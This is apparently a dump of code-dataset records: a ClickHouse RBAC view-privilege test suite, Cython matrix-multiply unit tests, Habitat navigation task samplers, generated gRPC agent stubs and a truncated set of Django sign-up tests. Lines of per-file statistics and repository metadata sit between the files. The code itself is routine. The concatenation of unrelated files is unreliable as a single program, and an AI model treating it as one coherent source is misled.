node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view with a stored query that includes other views if and only if
the user has select privilege on all of the views and the source tables for those views, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_nested_views,
name="select with nested views, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_nested_views,
name="select with nested views, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_nested_views(self, grant_target_name, user_name, node=None):
"""Grant SELECT on views and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view0_name = f"view0_{getuid()}"
view1_name = f"view1_{getuid()}"
view2_name = f"view2_{getuid()}"
view3_name = f"view3_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view3_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
try:
with Given("I have some views"):
node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
node.query(f"CREATE VIEW {view1_name} AS SELECT y FROM {view0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y<2)")
node.query(f"CREATE VIEW {view2_name} AS SELECT y FROM {view1_name} JOIN {table2_name} USING y")
node.query(f"CREATE VIEW {view3_name} AS SELECT y FROM {view2_name} UNION ALL SELECT y FROM {table3_name}")
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view3_name=view3_name),
settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in ([0,1,3,5,7,13,15,23,31,45,63,95,127,173,237,247,253],permutations(table_count=8))[self.context.stress]:
with grant_select_on_table(node, permutation, grant_target_name, view3_name, table3_name, view2_name, view1_name, table2_name, view0_name, table1_name, table0_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view3_name=view3_name),
settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all views"):
with grant_select_on_table(node, max(permutations(table_count=8))+1, grant_target_name, view0_name, view1_name, view2_name, view3_name, table0_name, table1_name, table2_name, table3_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view3_name=view3_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the views"):
with When("I drop view0", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with And("I drop view1", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view2_name}")
with And("I drop view2", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view1_name}")
with And("I drop view3", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_View_Drop("1.0"),
)
def drop(self, node=None):
"""Test the RBAC functionality of the `DROP VIEW` command.
"""
Scenario(run=drop_with_privilege_granted_directly_or_via_role)
Scenario(run=drop_with_revoked_privilege_revoked_directly_or_from_role)
@TestScenario
def drop_with_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to drop view with DROP VIEW privilege if the user has privilege directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=drop_with_privilege,
name="drop privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=drop_with_privilege,
name="drop privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_privilege(self, grant_target_name, user_name, node=None):
"""Grant DROP VIEW privilege and check the user is able to successfully drop a view.
"""
view_name = f"view_{getuid()}"
exitcode, message = errors.table_does_not_exist(name=f"default.{view_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with When("I grant DROP VIEW privilege"):
node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")
with And("I drop the view as the user"):
node.query(f"DROP VIEW {view_name}", settings = [("user",f"{user_name}")])
with Then("I check the table does not exist"):
node.query(f"SELECT * FROM {view_name}", exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def drop_with_revoked_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to drop view with DROP VIEW privilege revoked directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=drop_with_revoked_privilege,
name="drop privilege revoked directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=drop_with_revoked_privilege,
name="drop privilege revoked from a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_revoked_privilege(self, grant_target_name, user_name, node=None):
"""Revoke DROP VIEW privilege and check the user is unable to DROP a view.
"""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with When("I grant DROP VIEW privilege"):
node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")
with And("I revoke DROP VIEW privilege"):
node.query(f"REVOKE DROP VIEW ON {view_name} FROM {grant_target_name}")
with Then("I drop the view as the user"):
node.query(f"DROP VIEW {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestFeature
@Requirements(
RQ_SRS_006_RBAC_View("1.0"),
)
@Name("view")
def feature(self, stress=None, parallel=None, node="clickhouse1"):
self.context.node = self.context.cluster.node(node)
if stress is not None:
self.context.stress = stress
if parallel is not None:
self.context.stress = parallel
tasks = []
pool = Pool(3)
try:
try:
for suite in loads(current_module(), Suite):
run_scenario(pool, tasks, suite)
finally:
join(tasks)
finally:
pool.close()
| 51.877042
| 242
| 0.660716
| 8,644
| 60,333
| 4.39727
| 0.019435
| 0.052407
| 0.03236
| 0.022731
| 0.970508
| 0.963825
| 0.952591
| 0.94733
| 0.940174
| 0.923283
| 0
| 0.010217
| 0.234266
| 60,333
| 1,162
| 243
| 51.921687
| 0.812528
| 0.097873
| 0
| 0.777778
| 0
| 0.006803
| 0.302778
| 0.012918
| 0
| 0
| 0
| 0
| 0.005669
| 1
| 0.049887
| false
| 0
| 0.005669
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60ba39d9c066d15edc2c028cda4222e23d077191
| 3,658
|
py
|
Python
|
tests/test_tutorial_mul.py
|
sdpython/td3a_cpp
|
f78cdc1e5b97df747b088e9c4c339b25bae7fba9
|
[
"MIT"
] | 1
|
2020-09-12T16:36:55.000Z
|
2020-09-12T16:36:55.000Z
|
tests/test_tutorial_mul.py
|
AmineDiro/td3a_cpp
|
16b669babf29335da2c76a14eaa886d16af210da
|
[
"MIT"
] | null | null | null |
tests/test_tutorial_mul.py
|
AmineDiro/td3a_cpp
|
16b669babf29335da2c76a14eaa886d16af210da
|
[
"MIT"
] | 6
|
2020-02-03T12:02:48.000Z
|
2021-01-21T16:36:54.000Z
|
"""
Unit tests for ``random_strategy``.
"""
import unittest
import numpy
from numpy.testing import assert_almost_equal
from td3a_cpp.tutorial.mul_cython_omp import dmul_cython_omp
class TestTutorialMul(unittest.TestCase):
def test_matrix_mul(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
res1 = va @ vb
res2 = dmul_cython_omp(va, vb)
assert_almost_equal(res1, res2)
def test_matrix_mul_fail(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
with self.assertRaises(RuntimeError):
dmul_cython_omp(va, vb, algo=4)
def test_matrix_mul_algo(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
res1 = va @ vb
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_para(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
res1 = va @ vb
for algo in range(0, 2):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo, parallel=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_t(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(5, 4).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_t_big(self):
va = numpy.random.randn(300, 400).astype(numpy.float64)
vb = numpy.random.randn(500, 400).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_t_big_odd(self):
va = numpy.random.randn(30, 41).astype(numpy.float64)
vb = numpy.random.randn(50, 41).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_para_t(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(5, 4).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 2):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo, parallel=1,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_para_t_big(self):
va = numpy.random.randn(300, 400).astype(numpy.float64)
vb = numpy.random.randn(500, 400).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 2):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo, parallel=1,
b_trans=1)
assert_almost_equal(res1, res2)
if __name__ == '__main__':
unittest.main()
| 38.104167
| 69
| 0.579005
| 503
| 3,658
| 4.025845
| 0.127237
| 0.097778
| 0.142222
| 0.071111
| 0.870617
| 0.849877
| 0.829136
| 0.811358
| 0.811358
| 0.791111
| 0
| 0.058498
| 0.308365
| 3,658
| 95
| 70
| 38.505263
| 0.741897
| 0.009568
| 0
| 0.708861
| 0
| 0
| 0.002213
| 0
| 0
| 0
| 0
| 0
| 0.126582
| 1
| 0.113924
| false
| 0
| 0.050633
| 0
| 0.177215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7189516ae12da8584b01f60f6b34565cbfed8c79
| 7,071
|
py
|
Python
|
plugins/habitat_plugin/habitat_task_samplers.py
|
mattdeitke/allenact-1
|
70f106b32a38424e862399a76d84f607838063be
|
[
"MIT"
] | null | null | null |
plugins/habitat_plugin/habitat_task_samplers.py
|
mattdeitke/allenact-1
|
70f106b32a38424e862399a76d84f607838063be
|
[
"MIT"
] | null | null | null |
plugins/habitat_plugin/habitat_task_samplers.py
|
mattdeitke/allenact-1
|
70f106b32a38424e862399a76d84f607838063be
|
[
"MIT"
] | null | null | null |
from typing import List, Optional, Union, Callable
import gym
import habitat
from habitat.config import Config
from core.base_abstractions.sensor import Sensor
from core.base_abstractions.task import TaskSampler
from plugins.habitat_plugin.habitat_environment import HabitatEnvironment
from plugins.habitat_plugin.habitat_tasks import PointNavTask, ObjectNavTask # type: ignore
class PointNavTaskSampler(TaskSampler):
def __init__(
self,
env_config: Config,
sensors: List[Sensor],
max_steps: int,
action_space: gym.Space,
distance_to_goal: float,
filter_dataset_func: Optional[
Callable[[habitat.Dataset], habitat.Dataset]
] = None,
**task_init_kwargs,
) -> None:
self.grid_size = 0.25
self.env: Optional[HabitatEnvironment] = None
self.max_tasks: Optional[int] = None
self.reset_tasks: Optional[int] = None
self.sensors = sensors
self.max_steps = max_steps
self._action_space = action_space
self.env_config = env_config
self.distance_to_goal = distance_to_goal
self.seed: Optional[int] = None
self.filter_dataset_func = filter_dataset_func
self._last_sampled_task: Optional[PointNavTask] = None
self.task_init_kwargs = task_init_kwargs
def _create_environment(self) -> HabitatEnvironment:
dataset = habitat.make_dataset(
self.env_config.DATASET.TYPE, config=self.env_config.DATASET
)
if len(dataset.episodes) == 0:
raise RuntimeError("Empty input dataset.")
if self.filter_dataset_func is not None:
dataset = self.filter_dataset_func(dataset)
if len(dataset.episodes) == 0:
raise RuntimeError("Empty dataset after filtering.")
env = HabitatEnvironment(config=self.env_config, dataset=dataset)
self.max_tasks = (
None if self.env_config.MODE == "train" else env.num_episodes
) # env.num_episodes
self.reset_tasks = self.max_tasks
return env
@property
def length(self) -> Union[int, float]:
"""
@return: Number of total tasks remaining that can be sampled. Can be float('inf').
"""
return float("inf") if self.max_tasks is None else self.max_tasks
@property
def total_unique(self) -> Union[int, float, None]:
return self.env.num_episodes
@property
def last_sampled_task(self) -> Optional[PointNavTask]:
return self._last_sampled_task
def close(self) -> None:
if self.env is not None:
self.env.stop()
@property
def all_observation_spaces_equal(self) -> bool:
"""
@return: True if all Tasks that can be sampled by this sampler have the
same observation space. Otherwise False.
"""
return True
def next_task(self, force_advance_scene=False) -> Optional[PointNavTask]:
if self.max_tasks is not None and self.max_tasks <= 0:
return None
if self.env is not None:
self.env.reset()
else:
self.env = self._create_environment()
self.env.reset()
ep_info = self.env.get_current_episode()
target = ep_info.goals[0].position
task_info = {
"target": target,
"distance_to_goal": self.distance_to_goal,
}
self._last_sampled_task = PointNavTask(
env=self.env,
sensors=self.sensors,
task_info=task_info,
max_steps=self.max_steps,
action_space=self._action_space,
**self.task_init_kwargs,
)
if self.max_tasks is not None:
self.max_tasks -= 1
return self._last_sampled_task
def reset(self):
self.max_tasks = self.reset_tasks
def set_seed(self, seed: int):
self.seed = seed
if seed is not None:
self.env.env.seed(seed)
class ObjectNavTaskSampler(TaskSampler):
def __init__(
self,
env_config: Config,
sensors: List[Sensor],
max_steps: int,
action_space: gym.Space,
distance_to_goal: float,
**kwargs,
) -> None:
self.grid_size = 0.25
self.env: Optional[HabitatEnvironment] = None
self.max_tasks: Optional[int] = None
self.reset_tasks: Optional[int] = None
self.sensors = sensors
self.max_steps = max_steps
self._action_space = action_space
self.env_config = env_config
self.distance_to_goal = distance_to_goal
self.seed: Optional[int] = None
self._last_sampled_task: Optional[ObjectNavTask] = None
def _create_environment(self) -> HabitatEnvironment:
dataset = habitat.make_dataset(
self.env_config.DATASET.TYPE, config=self.env_config.DATASET
)
env = HabitatEnvironment(config=self.env_config, dataset=dataset)
self.max_tasks = (
None if self.env_config.MODE == "train" else env.num_episodes
) # mp3d objectnav val -> 2184
self.reset_tasks = self.max_tasks
return env
@property
def length(self) -> Union[int, float]:
"""
@return: Number of total tasks remaining that can be sampled. Can be float('inf').
"""
return float("inf") if self.max_tasks is None else self.max_tasks
@property
def total_unique(self) -> Union[int, float, None]:
return self.env.num_episodes
@property
def last_sampled_task(self) -> Optional[ObjectNavTask]:
return self._last_sampled_task
def close(self) -> None:
if self.env is not None:
self.env.stop()
@property
def all_observation_spaces_equal(self) -> bool:
"""
@return: True if all Tasks that can be sampled by this sampler have the
same observation space. Otherwise False.
"""
return True
def next_task(self, force_advance_scene=False) -> Optional[ObjectNavTask]:
if self.max_tasks is not None and self.max_tasks <= 0:
return None
if self.env is not None:
self.env.reset()
else:
self.env = self._create_environment()
self.env.reset()
ep_info = self.env.get_current_episode()
target = ep_info.goals[0].position
task_info = {
"target": target,
"distance_to_goal": self.distance_to_goal,
}
self._last_sampled_task = ObjectNavTask(
env=self.env,
sensors=self.sensors,
task_info=task_info,
max_steps=self.max_steps,
action_space=self._action_space,
)
if self.max_tasks is not None:
self.max_tasks -= 1
return self._last_sampled_task
def reset(self):
self.max_tasks = self.reset_tasks
def set_seed(self, seed: int):
self.seed = seed
if seed is not None:
self.env.env.seed(seed)
| 31.287611
| 92
| 0.620421
| 863
| 7,071
| 4.862109
| 0.137891
| 0.056721
| 0.057197
| 0.036225
| 0.832936
| 0.806244
| 0.806244
| 0.806244
| 0.806244
| 0.78408
| 0
| 0.003801
| 0.293028
| 7,071
| 225
| 93
| 31.426667
| 0.835567
| 0.06463
| 0
| 0.77907
| 0
| 0
| 0.016915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0
| 0.046512
| 0.023256
| 0.255814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71ae39d611bc7834df990ccc83d4264e08958cf7
| 12,631
|
py
|
Python
|
server/grpc/example_pb2_grpc.py
|
amine-ouertani/DigitalBeing
|
1acba704d4dd512b54b3cce124ecad3926268695
|
[
"MIT"
] | null | null | null |
server/grpc/example_pb2_grpc.py
|
amine-ouertani/DigitalBeing
|
1acba704d4dd512b54b3cce124ecad3926268695
|
[
"MIT"
] | null | null | null |
server/grpc/example_pb2_grpc.py
|
amine-ouertani/DigitalBeing
|
1acba704d4dd512b54b3cce124ecad3926268695
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import example_pb2 as example__pb2
class AgentStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.InitializeAgents = channel.unary_unary(
'/Agent/InitializeAgents',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleMessage = channel.unary_unary(
'/Agent/HandleMessage',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.InvokeSoloAgent = channel.unary_unary(
'/Agent/InvokeSoloAgent',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.GetAgents = channel.unary_unary(
'/Agent/GetAgents',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.SetAgentFields = channel.unary_unary(
'/Agent/SetAgentFields',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleSlashCommand = channel.unary_unary(
'/Agent/HandleSlashCommand',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleUserUpdate = channel.unary_unary(
'/Agent/HandleUserUpdate',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleMessageReaction = channel.unary_unary(
'/Agent/HandleMessageReaction',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
class AgentServicer(object):
"""Missing associated documentation comment in .proto file."""
def InitializeAgents(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleMessage(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InvokeSoloAgent(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAgents(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetAgentFields(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleSlashCommand(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleUserUpdate(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleMessageReaction(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AgentServicer_to_server(servicer, server):
rpc_method_handlers = {
'InitializeAgents': grpc.unary_unary_rpc_method_handler(
servicer.InitializeAgents,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleMessage': grpc.unary_unary_rpc_method_handler(
servicer.HandleMessage,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'InvokeSoloAgent': grpc.unary_unary_rpc_method_handler(
servicer.InvokeSoloAgent,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'GetAgents': grpc.unary_unary_rpc_method_handler(
servicer.GetAgents,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'SetAgentFields': grpc.unary_unary_rpc_method_handler(
servicer.SetAgentFields,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleSlashCommand': grpc.unary_unary_rpc_method_handler(
servicer.HandleSlashCommand,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleUserUpdate': grpc.unary_unary_rpc_method_handler(
servicer.HandleUserUpdate,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleMessageReaction': grpc.unary_unary_rpc_method_handler(
servicer.HandleMessageReaction,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Agent', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Agent(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def InitializeAgents(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/InitializeAgents',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleMessage(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessage',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InvokeSoloAgent(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/InvokeSoloAgent',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAgents(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/GetAgents',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetAgentFields(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/SetAgentFields',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleSlashCommand(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleSlashCommand',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleUserUpdate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleUserUpdate',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleMessageReaction(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessageReaction',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 42.385906
| 93
| 0.640804
| 1,080
| 12,631
| 7.237037
| 0.088889
| 0.063971
| 0.052201
| 0.069601
| 0.809237
| 0.809237
| 0.809237
| 0.770343
| 0.763434
| 0.748849
| 0
| 0.005517
| 0.28248
| 12,631
| 297
| 94
| 42.52862
| 0.856891
| 0.067849
| 0
| 0.698413
| 1
| 0
| 0.072847
| 0.026109
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.007937
| 0.031746
| 0.123016
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e2987dd8aec6a260512b9e75fb3ee33fd4b592
| 20,953
|
py
|
Python
|
user/tests/test_authentication.py
|
dev-jochland/Employee-Management-System
|
e4a1e87b7bd9b72a2fa6eaf11293eaad50803ad8
|
[
"MIT"
] | null | null | null |
user/tests/test_authentication.py
|
dev-jochland/Employee-Management-System
|
e4a1e87b7bd9b72a2fa6eaf11293eaad50803ad8
|
[
"MIT"
] | null | null | null |
user/tests/test_authentication.py
|
dev-jochland/Employee-Management-System
|
e4a1e87b7bd9b72a2fa6eaf11293eaad50803ad8
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
import user.models as um
class OrganisationSignUpTest(TestCase):
def setUp(self) -> None:
self.client = APIClient()
def test_organisation_can_sign_up(self):
good_data = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
data_without_full_name = {
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
data_with_invalid_full_name = {
"full_name": "Company",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
data_without_company_name = {
"full_name": "Company One",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
data_without_valid_email = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
data_without_email = {
"full_name": "Company One",
"company_name": "Company group",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword"
}
data_without_role = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"password1": "testpassword",
"password2": "testpassword"
}
data_without_password1 = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password2": "testpassword"
}
data_without_password2 = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword"
}
data_without_matching_password = {
"full_name": "Company One",
"company_name": "Company group",
"email": "company1@user.com",
"role": "CEO",
"password1": "testpassword",
"password2": "testpassword1"
}
existing_company_name = {
